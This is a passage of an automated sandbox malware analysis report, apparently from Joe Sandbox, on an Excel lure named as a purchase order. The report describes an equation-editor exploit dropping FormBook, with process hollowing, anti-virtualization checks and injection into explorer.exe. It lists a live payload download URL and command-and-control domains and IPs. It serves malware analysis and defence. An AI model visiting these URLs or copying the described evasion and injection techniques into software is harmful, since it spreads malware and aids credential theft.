          Source: Binary string: wntdll.pdb source: word.exe, word.exe, 00000005.00000002.519963830.0000000000980000.00000040.00000001.sdmp, word.exe, 00000005.00000003.460762852.0000000000230000.00000004.00000001.sdmp, word.exe, 00000005.00000002.520313707.0000000000B00000.00000040.00000001.sdmp, word.exe, 00000005.00000003.461783755.0000000000440000.00000004.00000001.sdmp, cscript.exe, cscript.exe, 00000007.00000002.674110480.00000000022E0000.00000040.00000001.sdmp, cscript.exe, 00000007.00000002.674256925.0000000002460000.00000040.00000001.sdmp, cscript.exe, 00000007.00000003.517708547.0000000001FF0000.00000004.00000001.sdmp
          Source: Binary string: cscript.pdbN source: word.exe, 00000005.00000002.518071129.0000000000800000.00000040.00020000.sdmp, word.exe, 00000005.00000002.518112601.000000000089D000.00000004.00000020.sdmp
          Source: Binary string: cscript.pdb source: word.exe, 00000005.00000002.518071129.0000000000800000.00000040.00020000.sdmp, word.exe, 00000005.00000002.518112601.000000000089D000.00000004.00000020.sdmp
          Source: HME AG PO 2091.xlsx | Initial sample: OLE indicators vbamacros = False
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 4_2_73291000 push eax; ret
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0041E9E6 push edx; ret
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_00416B6D push ebx; ret
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0041D4F2 push eax; ret
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0041D4FB push eax; ret
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0041D4A5 push eax; ret
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0041D55C push eax; ret
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0041EEB5 push esi; ret
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_022FDFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0008D4A5 push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0008D4FB push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0008D4F2 push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0008D55C push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0008E9E6 push edx; ret
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_00086B6D push ebx; ret
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0008EEB5 push esi; ret
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 4_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ctf[1].exe
          Source: C:\Users\user\AppData\Roaming\word.exe | File created: C:\Users\user\AppData\Local\Temp\nskF75C.tmp\mtmmtvzho.dll
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\word.exe

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe | User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xEF
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\word.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cscript.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\AppData\Roaming\word.exe | RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\word.exe | RDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exe | RDTSC instruction interceptor: First address: 0000000000079904 second address: 000000000007990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exe | RDTSC instruction interceptor: First address: 0000000000079B6E second address: 0000000000079B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2864 | Thread sleep time: -300000s >= -30000s
          Source: C:\Windows\SysWOW64\cscript.exe TID: 2648 | Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\cscript.exe | Last function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_00409AA0 rdtsc
          Source: C:\Users\user\AppData\Roaming\word.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 4_2_00405D7C FindFirstFileA,FindClose,
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 4_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 4_2_00402630 FindFirstFileA,
          Source: C:\Users\user\AppData\Roaming\word.exe | API call chain: ExitProcess graph end node
          Source: C:\Users\user\AppData\Roaming\word.exe | API call chain: ExitProcess graph end node
          Source: explorer.exe, 00000006.00000000.505342356.0000000000255000.00000004.00000020.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.488895947.000000000457A000.00000004.00000001.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000006.00000000.488895947.000000000457A000.00000004.00000001.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: word.exe, 00000004.00000002.461029168.00000000005C4000.00000004.00000020.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: explorer.exe, 00000006.00000000.469092252.00000000044E7000.00000004.00000001.sdmp | Binary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
          Source: explorer.exe, 00000006.00000000.474172452.000000000029B000.00000004.00000020.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
          Source: explorer.exe, 00000006.00000000.507910245.00000000045D6000.00000004.00000001.sdmp | Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 4_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_00409AA0 rdtsc
          Source: C:\Users\user\AppData\Roaming\word.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\cscript.exe | Process token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 4_2_0018E912 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 4_2_0018EC54 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 4_2_0018EC16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 4_2_0018EBD7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 4_2_0018EB26 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_009A26F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_022E0080 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_022E00EA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_023026F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\word.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\cscript.exe | Process queried: DebugPort
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0040ACE0 LdrLoadDll,

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe | Network Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exe | Domain query: www.ponto-bras.space
          Source: C:\Windows\explorer.exe | Domain query: www.hydrogendatapower.com
          Source: C:\Windows\explorer.exe | Network Connect: 198.54.117.212 80
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Roaming\word.exe | Section unmapped: C:\Windows\SysWOW64\cscript.exe base address: 8C0000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Roaming\word.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\word.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\word.exe | Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\word.exe | Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cscript.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cscript.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign process
          Source: C:\Users\user\AppData\Roaming\word.exe | Memory written: C:\Users\user\AppData\Roaming\word.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Roaming\word.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Roaming\word.exe | Thread register set: target process: 1764
          Source: C:\Users\user\AppData\Roaming\word.exe | Thread register set: target process: 1764
          Source: C:\Windows\SysWOW64\cscript.exe | Thread register set: target process: 1764
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe
          Source: C:\Users\user\AppData\Roaming\word.exe | Process created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe
          Source: C:\Windows\SysWOW64\cscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\word.exe"
          Source: explorer.exe, 00000006.00000000.505498445.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.463983735.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.474315481.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.484524293.0000000000750000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.474137031.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.484170367.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.463523222.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.505342356.0000000000255000.00000004.00000020.sdmp | Binary or memory string: ProgmanG
          Source: explorer.exe, 00000006.00000000.505498445.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.463983735.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.474315481.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.484524293.0000000000750000.00000002.00020000.sdmp | Binary or memory string: !Progman
          Source: explorer.exe, 00000006.00000000.505498445.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.463983735.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.474315481.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.484524293.0000000000750000.00000002.00020000.sdmp | Binary or memory string: Program Manager<
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 4_2_00405AA7 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 5.1.word.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.word.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.word.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.1.word.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.word.exe.430000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.word.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.word.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.word.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.word.exe.430000.3.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.word.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.word.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000005.00000002.517826427.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.517788299.0000000000380000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.459390145.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.483096274.0000000009453000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000001.460598651.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.460945641.0000000000430000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.460114935.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.518045796.00000000007D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.490835937.0000000009453000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.673558642.0000000000070000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.673637759.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.673598531.0000000000140000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match | File source: 5.1.word.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.word.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.word.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.1.word.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.word.exe.430000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.word.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.word.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.word.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.word.exe.430000.3.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.word.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.word.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000005.00000002.517826427.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.517788299.0000000000380000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.459390145.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.483096274.0000000009453000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000001.460598651.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.460945641.0000000000430000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.460114935.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.518045796.00000000007D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.490835937.0000000009453000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.673558642.0000000000070000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.673637759.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.673598531.0000000000140000.00000040.00020000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Native API 1 | Path Interception | Process Injection 612 | Rootkit 1 | Credential API Hooking 1 | Security Software Discovery 221 | Remote Services | Credential API Hooking 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
          Default Accounts | Shared Modules 1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Masquerading 1 | LSASS Memory | Virtualization/Sandbox Evasion 2 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 14 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | Exploitation for Client Execution 13 | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 2 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Clipboard Data 1 | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 612 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 123 | SIM Card Swap | Carrier Billing Fraud |
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 1 | LSA Secrets | File and Directory Discovery 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 2 | Cached Domain Credentials | System Information Discovery 14 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 1 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |

          Behavior Graph


          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          Behavior Graph ID: 553050
          Sample: HME AG PO 2091.xlsx
          Startdate: 14/01/2022
          Architecture: WINDOWS
          Score: 100

          Signatures attached to the sample node:
          • Found malware configuration
          • Malicious sample detected (through community Yara rule)
          • Antivirus detection for URL or domain
          • 12 other signatures

          Process tree recovered from the graph:

          EXCEL.EXE 53 12 (started)
            dropped: C:\Users\user\Desktop\~$HME AG PO 2091.xlsx, data

          EQNEDT32.EXE 11 (started)
            DNS/IP: rfr.lt 91.203.68.162, 49165, 80 NANO-ASLV Latvia
            dropped: C:\Users\user\AppData\Roaming\word.exe, PE32
            dropped: C:\Users\user\AppData\Local\...\ctf[1].exe, PE32
            signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
            word.exe 19 (started)
              dropped: C:\Users\user\AppData\Local\...\mtmmtvzho.dll, PE32
              signature: Multi AV Scanner detection for dropped file
              signature: Machine Learning detection for dropped file
              signature: Tries to detect virtualization through RDTSC time measurements
              signature: Injects a PE file into a foreign processes
              word.exe (started)
                signature: Modifies the context of a thread in another process (thread injection)
                signature: Maps a DLL or memory area into another process
                signature: Sample uses process hollowing technique
                signature: Queues an APC in another process (thread injection)
                explorer.exe (injected)
                  DNS/IP: shops.myshopify.com 23.227.38.74, 49166, 80 CLOUDFLARENETUS Canada
                  DNS/IP: www.ponto-bras.space
                  DNS/IP: 2 other IPs or domains
                  signature: System process connects to network (likely due to code injection or exploit)
                  cscript.exe (started)
                    signature: Modifies the context of a thread in another process (thread injection)
                    signature: Maps a DLL or memory area into another process
                    signature: Tries to detect virtualization through RDTSC time measurements
                    cmd.exe (started)

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          HME AG PO 2091.xlsx | 43% | Virustotal |
          HME AG PO 2091.xlsx | 33% | ReversingLabs | Document-Office.Exploit.CVE-2017-11882
          HME AG PO 2091.xlsx | 100% | Joe Sandbox ML |

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ctf[1].exe | 100% | Joe Sandbox ML |
          C:\Users\user\AppData\Roaming\word.exe | 100% | Joe Sandbox ML |
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ctf[1].exe | 42% | ReversingLabs | Win32.Worm.SpyBot
          C:\Users\user\AppData\Local\Temp\nskF75C.tmp\mtmmtvzho.dll | 33% | ReversingLabs | Win32.Trojan.SpyNoon
          C:\Users\user\AppData\Roaming\word.exe | 42% | ReversingLabs | Win32.Worm.SpyBot

          Unpacked PE Files

          Source | Detection | Scanner | Label
          5.2.word.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          5.1.word.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          7.2.cscript.exe.2abf840.7.unpack | 100% | Avira | TR/Patched.Ren.Gen
          5.0.word.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          5.0.word.exe.400000.3.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          4.2.word.exe.430000.3.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          5.0.word.exe.400000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          7.2.cscript.exe.4d22e0.0.unpack | 100% | Avira | TR/Patched.Ren.Gen

          Domains

          Source | Detection | Scanner | Label
          rfr.lt | 4% | Virustotal |
          shops.myshopify.com | 1% | Virustotal |
          www.hydrogendatapower.com | 0% | Virustotal |

          URLs

          Source | Detection | Scanner | Label
          www.rthearts.com/nk6l/ | 0% | Avira URL Cloud | safe
          http://wellformedweb.org/CommentAPI/ | 0% | URL Reputation | safe
          http://rfr.lt/ctf.exe | 100% | Avira URL Cloud | malware
          http://www.iis.fhg.de/audioPA | 0% | URL Reputation | safe
          http://www.hydrogendatapower.com/nk6l/?f4=mG3MZX+V/2vUvLkm+jLYc6BPCVMMOHSbAyziOVKuBi9N3RYpJJdcI8Zb3DbFfMMicqDibw==&9r7t=5jSPntk89D | 0% | Avira URL Cloud | safe
          http://www.mozilla.com0 | 0% | URL Reputation | safe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
          http://treyresearch.net | 0% | URL Reputation | safe
          http://java.sun.com | 0% | URL Reputation | safe
          http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
          http://computername/printers/printername/.printer | 0% | Avira URL Cloud | safe
          http://www.%s.comPA | 0% | URL Reputation | safe
          http://www.ponto-bras.space/nk6l/?f4=dUEi0UXeDjZ3satn024Wp6SV8B9ayfLzJlVAsh/H0s9uKTFfRfoB4Zp7QfR2IB/+as7LEQ==&9r7t=5jSPntk89D | 0% | Avira URL Cloud | safe
          http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          rfr.lt | 91.203.68.162 | true | true | | unknown
          parkingpage.namecheap.com | 198.54.117.212 | true | false | | high
          shops.myshopify.com | 23.227.38.74 | true | true | | unknown
          www.hydrogendatapower.com | unknown | unknown | true | | unknown
          www.ponto-bras.space | unknown | unknown | true | | unknown

              Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          www.rthearts.com/nk6l/ | true | Avira URL Cloud: safe | low
          http://rfr.lt/ctf.exe | true | Avira URL Cloud: malware | unknown
          http://www.hydrogendatapower.com/nk6l/?f4=mG3MZX+V/2vUvLkm+jLYc6BPCVMMOHSbAyziOVKuBi9N3RYpJJdcI8Zb3DbFfMMicqDibw==&9r7t=5jSPntk89D | true | Avira URL Cloud: safe | unknown
          http://www.ponto-bras.space/nk6l/?f4=dUEi0UXeDjZ3satn024Wp6SV8B9ayfLzJlVAsh/H0s9uKTFfRfoB4Zp7QfR2IB/+as7LEQ==&9r7t=5jSPntk89D | true | Avira URL Cloud: safe | unknown

              URLs from Memory and Binaries

          Name | Source | Malicious | Antivirus Detection | Reputation
          http://www.windows.com/pctv. | explorer.exe, 00000006.00000000.466600735.0000000002AE0000.00000002.00020000.sdmp | false | | high
          http://investor.msn.com | explorer.exe, 00000006.00000000.466600735.0000000002AE0000.00000002.00020000.sdmp | false | | high
          http://www.msnbc.com/news/ticker.txt | explorer.exe, 00000006.00000000.466600735.0000000002AE0000.00000002.00020000.sdmp | false | | high
          http://wellformedweb.org/CommentAPI/ | explorer.exe, 00000006.00000000.469518073.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.508105217.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
          http://www.iis.fhg.de/audioPA | explorer.exe, 00000006.00000000.469518073.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
          http://www.mozilla.com0 | explorer.exe, 00000006.00000000.490190068.00000000077B8000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          http://nsis.sf.net/NSIS_ErrorError | word.exe, 00000004.00000002.460903061.0000000000409000.00000004.00020000.sdmp, word.exe, 00000004.00000000.455354030.0000000000409000.00000008.00020000.sdmp, word.exe, 00000005.00000000.457625116.0000000000409000.00000008.00020000.sdmp | false | | high
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true | explorer.exe, 00000006.00000000.486080664.0000000002CC7000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
          http://www.hotmail.com/oe | explorer.exe, 00000006.00000000.466600735.0000000002AE0000.00000002.00020000.sdmp | false | | high
          http://treyresearch.net | explorer.exe, 00000006.00000000.469518073.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.508105217.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
